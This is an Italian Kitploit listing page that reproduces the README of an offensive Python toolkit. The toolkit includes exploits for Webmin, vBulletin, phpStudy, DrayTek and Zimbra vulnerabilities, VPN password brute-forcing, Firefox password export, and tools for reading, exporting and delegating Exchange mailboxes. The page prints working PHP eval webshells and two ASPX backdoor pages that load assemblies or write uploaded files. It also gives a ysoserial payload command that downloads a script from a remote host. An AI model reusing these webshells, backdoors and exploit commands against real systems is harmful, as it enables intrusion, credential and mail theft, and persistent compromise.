Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Homework-of-Python — Python codes of my blog. | Kitploit
Strumenti/GitHubGitHub/3gstudent/homework-of-python
Vulnerability ScannersPassword AttacksExploitationWeb Application ExploitationInformation GatheringPost-ExploitationRed TeamingPayload Development
GitHub3gstudent/homework-of-python

Homework-of-Python

Python codes of my blog.

Vedi Repository
4121263 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Homework-of-Python

Codici Python del mio blog.

pptp_password_hack.py

Usa un attacco di forza bruta per ottenere la password della VPN PPTP.

Legge le password dal file (chiamato wordlist) e poi usa pptpsetup per connettersi al server.

L'intervallo di tempo è di 10 secondi.


portscan.py

Usato per scansionare le porte.

Il timeout è di 3 secondi.

versione C++:

https://github.com/3gstudent/Homework-of-C-Language/blob/master/portscan.cpp


urltoip.py

Usato per ottenere l'IP da un URL.

Posso usare direttamente il risultato di Sublist3r.

file_deduplication(For_urltoip).py

Usato per rimuovere gli IP duplicati dal risultato di Sublist3r.

Posso usare direttamente il risultato di urltoip.py.

Gli IP possono essere ordinati usando Sublime (F9).


file_deduplication.py

Usato per rimuovere elementi duplicati da un file.

Webmin<=1.920-Unauthenticated_RCE(CVE-2019-15107).py

Riferimento:

https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html


fofa_api.py

Usato per chiamare l'API di fofa e stampare gli IP dai risultati.

Puoi ottenere 100 risultati.

fofa_api_VIP.py

Usato per chiamare l'API di fofa e stampare gli IP dai risultati.

Se sei VIP, ottieni 10000 risultati.


vBulletin_5.x_0day_pre-auth_RCE.py

Riferimento:

https://seclists.org/fulldisclosure/2019/Sep/31

Es.

root@kitploit:~
echo \<?php @eval\(\$_POST[pwd]\)\;?\> >test.php

phpStudy_5.2-5.45_(php_xmlrpc.dll)_backdoor_RCE.py

Riferimento:

https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w

Es.

root@kitploit:~
system('cmd /c "echo ^<?php @eval(^$_POST[pwd]);?^> >D:\phpstudy\WWW\test.php"');

ExportFirefoxPassword.py

Usato per esportare la password di Firefox

get_Exchange_version.py

Usato per ottenere la versione di Exchange.

Prima ottieni il BuildNumber dal codice sorgente dell'URL e poi ottieni la versione.

Riferimento:

https://docs.microsoft.com/en-us/Exchange/new-features/build-numbers-and-release-dates?redirectedfrom=MSDN&view=exchserver-2019


SMBv3_RCE_Scanner(CVE-2020-0796).py

Usato per scansionare la vulnerabilità SMBv3 RCE.

Il timeout è di 3 secondi.


Unauthenticated_RCE_in_Draytek_Vigor2960\3900\300B.py

Riferimento:

https://github.com/imjdl/CVE-2020-8515-PoC

CVE-2020-8515

I dispositivi DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta e Vigor300B 1.3.3_Beta, 1.4.2.1_Beta e 1.4.4_Beta consentono l'esecuzione remota di codice come root (senza autenticazione) tramite metacaratteri di shell verso l'URI cgi-bin/mainfunction.cgi..

Prodotti interessati:

  • Vigor300B <v1.5.1
  • Vigor2960 <v1.5.1
  • Vigor3900 <v1.5.1

Zimbra_SOAP_API_Manage.py

Usa l'API SOAP di Zimbra per connettersi al server di posta Zimbra.

Uso:

root@kitploit:~
      Zimbra_SOAP_API.py <url> <username> <password> <mode>

modalità:

  • low autenticazione per token basso
  • admin autenticazione per token admin
  • ssrf usa CVE-2019-9621 per ottenere il token admin

Es:

root@kitploit:~
      Zimbra_SOAP_API.py https://192.168.1.1 [email protected] password low

checkEWS.py

Usato per verificare la validità di un account di Exchange Web Service (supporta plaintext e ntlmhash)

Riferimento:https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py

Uso:

root@kitploit:~
checkEWS.py <host> <port> <mode> <domain> <user> <password>
<mode>:
- plaintext
- ntlmhash

Es.

root@kitploit:~
checkEWS.py 192.168.1.1 443 plaintext test.com user1 password1
checkEWS.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1

checkAutodiscover.py

Usato per accedere ad Autodiscover.xml e ottenere la configurazione dell'utente (supporta plaintext e ntlmhash)

Uso:

root@kitploit:~
checkAutodiscover.py <host> <port> <mode> <email> <password> <command>
<command>:
- checkautodiscover
- getusersetting
- checkoab
- downloadlzx

Es.

root@kitploit:~
checkAutodiscover.py 192.168.1.1 443 plaintext [email protected] password1 checkaut
odiscover
checkAutodiscover.py test.com 80 ntlmhash [email protected] c5a237b7e9d8e708d8436b6
148a25fa1 getusersetting

checkAutodiscoverEx.py

Modalità extra di checkAutodiscover.py

Aggiunge un parametro

ewsManage.py

Usato per accedere a Exchange Web Service (supporta plaintext e ntlmhash)

Uso:

root@kitploit:~
ewsManage.py <host> <port> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
<command>:
- getfolderofinbox
- getfolderofsentitems
- listmailofinbox
- listmailofsentitems
- listmailoffolder
- getmail
- deletemail
- deletefolder
- getattachment
- saveattachment
- getdelegateofinbox
- adddelegateofinbox
- updatedelegateofinbox
- removedelegateofinbox
- getdelegateofinbox2
- updatedelegateofinbox2
- restoredelegateofinbox2
- getinboxrules
- updateinboxrules
- removeinboxrules
- deleteattachment
- createattachment
- createfolderofinbox
- listhiddenfolderofinbox
- createtestmail
- SetHiddenPropertyType
- UpdateHiddenPropertyType
- getcontact
- findpeople
- findallpeople
- resolvename
- resolveallname


Es.

root@kitploit:~
ewsManage.py 192.168.1.1 443 plaintext test.com user1 password1 getfolderofinbox
ewsManage.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1 listmailofinbox

sshCheck.py

Usato per verificare credenziali SSH valide (supporta password e file di chiave privata)

Uso:

root@kitploit:~
sshCheck.py <host> <port> <mode><user> <password>
<mode>:
- plaintext
- keyfile

Es.

root@kitploit:~
sshCheck.py 192.168.1.1 22 plaintext root toor
sshCheck.py 192.168.1.1 22 keyfile root id_rsa

sshRunCmd

Esecuzione remota di comandi via SSH (supporta password e file di chiave privata)

Uso:

root@kitploit:~
sshRunCmd.py <host> <port> <mode><user> <password> <cmd>
<mode>:
- plaintext
- keyfile
If the <cmd> is shell,you will get an interactive shell

Es.

root@kitploit:~
sshRunCmd.py 192.168.1.1 22 plaintext root toor shell
sshRunCmd.py 192.168.1.1 22 keyfile root id_rsa ps

easCheck.py

Usato per verificare la validità delle credenziali EAS (Exchange Server ActiveSync)

Uso:

root@kitploit:~
easCheck.py <host> <user> <password>

Es.

root@kitploit:~
easCheck.py 192.168.1.1 user1 password1

checkOWA.py

Usato per verificare la validità di un account Exchange connettendosi a OWA.

Uso:

root@kitploit:~
checkOWA.py <url> <user> <password>

owaManage.py

Usato per leggere le email connettendosi a OWA.

Uso:

root@kitploit:~
owaManage.py  <url> <user> <password> <command>
<command>
- ListFolder
- ViewMail
- DownloadAttachment

imapManage.py

Usa IMAP per connettersi al server di posta.

Uso:

root@kitploit:~
imapManage.py <IMAP server> <username> <password> <command>    
<command>:
CheckConfig             get the folder name
SaveAttachOfInbox       save the attachments of Inbox
SaveAttachOfSent        save the attachments of Sent
DownloadAllMailOfInbox  download all the mails of Inbox
DownloadAllMailOfSent   download all the mails of Sent
Eg:
imapManage.py 192.168.1.1 user1 password CheckConfig

aspxCmdNTLM.py

Usato per implementare l'autenticazione NTLM e comunicare con execCmd.aspx

I dati di comunicazione sono codificati con Base64

Uso:

root@kitploit:~
aspxCmdNTLM.py <host> <port> <url> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
Eg.
aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/1.txt plaintext test.com user
1 password1 whoami
aspxCmdNTLM.py test.com 80 http://192.168.1.1/1.aspx ntlmhash test.com user1 c5a
237b7e9d8e708d8436b6148a25fa1 whoami

SharpExchangeBackdoor.py

Versione C#: SharpExchangeBackdoor.cs

Usato per inviare payload alla backdoor webshell di Exchange.

Supporta:

  • assemblyLoad
  • webshellWrite

Uso:

root@kitploit:~
    <url> <user> <password> <mode> <path>
mode:
    assemblyLoad
    webshellWrite

es.

root@kitploit:~
    SharpExchangeBackdoor.py https://192.168.1.1/owa/auth/errorFE.aspx no auth assemblyLoad payload.dll
    SharpExchangeBackdoor.py https://192.168.1.1/ecp/About.aspx user1 123456 webshellWrite payload.aspx

assemblyLoad.aspx:

root@kitploit:~
<%@ Page Language="C#" %><%System.Reflection.Assembly.Load(Convert.FromBase64String(Request.Form["demodata"])).CreateInstance("Payload").Equals("");%>

webshellWrite.aspx:

root@kitploit:~
<%@ Page Language="C#" %><%if (Request.Files.Count!=0)Request.Files[0].SaveAs(Server.MapPath("./uploadDemo.aspx"));}%>

Zimbra_deserialization_RCE(CVE-2019-6980).py

Deserializzazione non sicura di oggetti - IMAP

Uso:

root@kitploit:~
<url> <user> <password> <payload path>

Es.

root@kitploit:~
https://192.168.1.1 [email protected] password1 payload.obj

Nota:

Puoi generare payload.obj in questo modo:

java -jar ysoserial.jar MozillaRhino2 "/usr/bin/wget https://192.168.1.1/test.sh --no-check-certificate -O /tmp/test.sh" > payload.obj


ExchangeDeserializeShell-NoAuth-TextFormattingRunProperties.py

ExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.py

ExchangeDeserializeShell-NoAuth-ghostfile.py

Usato per testare l'esecuzione di codice tramite deserializzazione in Exchange. Dai permessi di lettura e scrittura dei file di Exchange all'esecuzione di codice tramite deserializzazione. È necessario modificare la machineKey in %ExchangeInstallPath%\FrontEnd\HttpProxy\\web.config per implementare l'esecuzione di codice tramite deserializzazione. <path>: owa o ecp

Uso:

root@kitploit:~
    <url> <key> <path>

es.

root@kitploit:~
 192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa
 mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp    

Exchange_EWS_XML_Parser.py

Usato per analizzare i messaggi XML SOAP di Exchange.


eacManage.py

Usato per accedere all'Exchange admin center

Uso:

root@kitploit:~
eacManage.py <url> <user> <password> <command>
<command>:
- ListAdminRoles
- NewAdminRoles
- EditAdminRoles
- DeleteAdminRoles
- AddMailbox
- RemoveMailbox
- ExportAllMailbox          
- GetCertificate 
- ExportCertificate          
          

vSphereAutomationAPI_Manage.py

Usa vSphere Automation API (v7.0U1+) per gestire la VM

Supporta VM Windows e Linux

vSphereWebServicesAPI_Manage.py

Usa vSphere Web Services API per gestire la VM

Riferimento: https://github.com/vmware/pyvmomi/

Installazione: pip install --upgrade pyvmomi

vCenterLDAP_Manage.py

Usato per gestire il database LDAP su vCenter.


SolarWindsOrion_Manage.py

Usato per gestire la piattaforma SolarWinds Orion

SolarWindsOrionAPI_Manage.py

Usa SolarWinds Orion API per gestire la piattaforma Orion


MailEnableManage.py

Usato per gestire il server di posta MailEnable


blind_XXEPlatform_CVE-2019-9670.py

Supporta la ricezione dei risultati tramite protocollo HTTP o FTP.


ewsManage_Downloader.py

Usato per accedere a Exchange Web Service (supporta plaintext e ntlmhash)

ewsManage_exchangelib_Downloader.py

Usato per accedere a Exchange Web Service (supporta plaintext e ntlmhash)

ewsManage_requests_ntlm_Downloader.py

Usa requests_ntlm2 per accedere a Exchange Web Service (supporta plaintext e ntlmhash)

ewsManage_requests_ntlm_Session_Downloader.py

Usa requests_ntlm2 per accedere a Exchange Web Service (supporta plaintext e ntlmhash)

Usa la sessione per ridurre i dati di comunicazione


vCenter_ExtraCertFromMdb.py

Modificato da https://github.com/horizon3ai/vcenter_saml_login

vCenter_GenerateLoginCookie.py

Modificato da https://github.com/horizon3ai/vcenter_saml_login


Exchange_GetVersion_MatchVul.py

Usato per ottenere la versione di Exchange e abbinarla alle vulnerabilità esistenti

Exchange_GetVersion_ParseFromFile.py

Usato per ottenere la versione di Exchange e analizzare la versione da https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019

È necessario salvare https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019 come exchange.data

Exchange_GetVersion_ParseFromWebsite.py

Usato per ottenere la versione di Exchange e analizzare la versione da https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019


Exchange_GetInternalIP.py

Usato per ottenere l'IP interno di Exchange

Basato su msf auxiliary/scanner/http/owa_iis_internal_ip, ma supporta più server Exchange.


vRealizeOperationsManager_GetVersion.py

Usato per ottenere la versione di vRealize Operations Manager


BIG-IP_RunBash.py

Usa bash per eseguire comandi


SophosUTM_plxDecrypter.py

Usato per decrittare il file .plx di Sophos UTM

Riferimento:

https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223

https://github.com/the6p4c/bfs_extract

SophosUTM_ConfigParser.py

Usato per analizzare la configurazione di Sophos UTM


Scarica lo strumento